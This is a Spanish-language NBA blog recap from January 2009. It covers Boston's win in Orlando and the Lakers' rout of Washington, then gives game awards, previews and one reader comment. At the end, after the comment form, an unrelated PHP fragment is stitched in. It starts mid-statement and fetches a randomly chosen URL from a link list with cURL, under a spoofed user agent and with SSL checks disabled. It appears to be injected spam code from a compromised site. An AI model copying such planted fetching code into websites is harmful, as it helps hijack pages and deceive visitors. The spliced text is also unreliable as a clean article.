La crónica (22/1/2009)

23 de January de 2009 por MagicJohnson32

raydwight

Por MagicJohnson32 & Xapa-crack

Qué dos partidos tan diferentes se disputaron anoche. En primer lugar se jugó un Celtics @ Magic con sabor a reivindicación. No es que nadie descartase a Boston durante la mala racha que atravesaron a partir de la derrota navideña en el Staples, pero su victoria en Orlando sirve para certificar que vuelven a ser el equipo de desbordante intensidad y defensa asfixiante que conocíamos. Dejaron a los Magic en 80 puntos, su peor marca de la temporada y 22 puntos por debajo de su media anotadora. Pierce lideró las operaciones y fue el máximo anotador (27), reboteador (10) y asistente (4) de su equipo. Pero la clave del partido fue la desactivación de Dwight Howard, limitado a 11 puntos y 11 rebotes y que fue eliminado por faltas a poco del final cuando su equipo apuraba sus opciones de remontada. Los Celtics se consolidan así como el equipo con más victorias de la liga, con 36.

lakersbenchEl equipo con mejor porcentaje de triunfos, sin embargo, es otro: los Lakers, que se dieron un plácido paseo a costa de los Wizards en el otro encuentro de la noche. Ambos equipos afrontaban su segundo partido en 24 horas, pero eso sólo pareció afectar a los visitantes. Y por segunda noche consecutiva, Andrew Bynum protagonizó el ataque angelino. A sus 42 puntos y 15 rebotes ante los Clippers le siguieron anoche 23 puntos y 14 rebotes en 27 minutos de juego. La exigencia fue mínima para los locales, que vencían 47-72 al descanso, y Phil Jackson se pudo permitir el dar descanso a los titulares, ninguno de los cuales alcanzó los 30 minutos de juego. Los capitalinos, que ya suman 33 derrotas, tuvieron en Jamison y McGee a sus mejores hombres.

pierceorlandoPREMIOS

MVP: Ayer tuvimos dos grandes actuaciones en los equipos ganadores. En primer lugar, el amarillo Andrew Bynum, con 23 puntos 14 rebotes 2 asistencias y 1 tapón, y que tras su MVP de ayer podría haber repetido premio de no ser por haber jugado contra los dos peores equipos de la liga sin juego interior alguno. Con este condicionante, el premio se va para el MVP de las finales del año pasado, Paul Pierce, que lideró a su equipo con 27 puntos 10 rebotes y 4 asistencias.

El rookie: Se lo vamos a dar a JaVale McGee, que no tuvo competencia alguna pero fue el jugador más eficiente de los Wizards.  Ayer, 18 puntos, 9 rebotes, 2 robos y 2 tapones para la 18ª elección del pasado draft. Todo esto, saliendo desde el banco para hacer el mejor partido de su carrera profesional, aunque fuese contra la segunda unidad de los Lakers

La sorpresa: Doc Rivers y su planteamiento que puso enfrente de la máquina de Florida, y es que secó al jugador más votado para el All Star, Dwight Howard, y lo dejó con 11 puntos y 11 rebotes. Kedrick Perkins y Glen Davis fueron los encargados del trabajo sucio.

La decepción: Esta sección la tenemos fácil, y se lo damos para la campaña que están haciendo los Magos, que se están quedando sin poderes. Ni el mismísimo Arenas podría encauzar la situación actual, en la que los capitalinos son el peor equipo de la conferencia Este y ya prácticamente los peores de la liga.

Mayor esfuerzo en vano: El turco Hedo Turkoglu no es el del año pasado y a pesar de que puso todo lo que pudo de su parte para que los celtics no se fueran en el choque estrella de la noche pero Howard no le ayudo y con 22 puntos, y 4-7 en triples se quedo en el intento.

Vemos las 5 mejores jugadas de la noche:

RAZONES PARA TRASNOCHAR

Entre los diez encuentros que se disputarán la próxima madrugada, nos quedamos con…

Mavs @ Pistons. Finalistas en 2005 (los Pistons) y 2006 (los Mavs), con un balance casi idéntico (24-18 para los texanos, 24-17 para los de Michigan), y con muchísimas dudas sobre el funcionamiento del equipo tras la incorporación de una estrella (Kidd por un lado y Iverson por el otro). Así se presenta este enfrentamiento en Auburn Hills, en el que comprobaremos si Nowitzki vuelve a quedarse solo o hay alguien que le eche una mano para lograr una victoria que les podría devolver a posiciones de Playoffs. Por los locales, el partido supone la segunda ocasión para ver el nuevo experimento: sacar a RIP Hamilton desde el montaokbanquillo. A la 1:00 de la madrugada.

El jugador al que conviene seguir de cerca es…

Monta Ellis. Tal vez no sea la mejor noche para regresar a las pistas tras una lesión tan larga, porque coincide con la visita de LeBron James a la bahía de Oackland. Lo más probable es que James robe todo el protagonismo a Ellis, pero trataremos de reservar un poco de nuestra atención al que era, al menos hasta su accidente en moto, jugador más veloz de la liga. A las 4:30 horas.

Y no queremos despedir esta crónica sin rendir un pequeño homenaje a Alonzo Mourning, que hace unas horas anunció su retirada definitiva.


Comenta

Un comentario a esta entrada

  1. Jabho dice:
    #1

    Como dices algo de reivindicación había. Si bien es normal perder partidos contra los grandes parace que las dos derrotas seguidas dejaban en el aire que se pudiera competir con Cavs o Magic. Ayer jugaron un partidazo en defensa y solo se les escapó el turco.

    Vital desactivar a Howard pero tb a Nelson y Rondo le controló 3 cuartos. En el último se centró Nelson y casi levanta el partido.

    Por otra parte muy grande Zo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>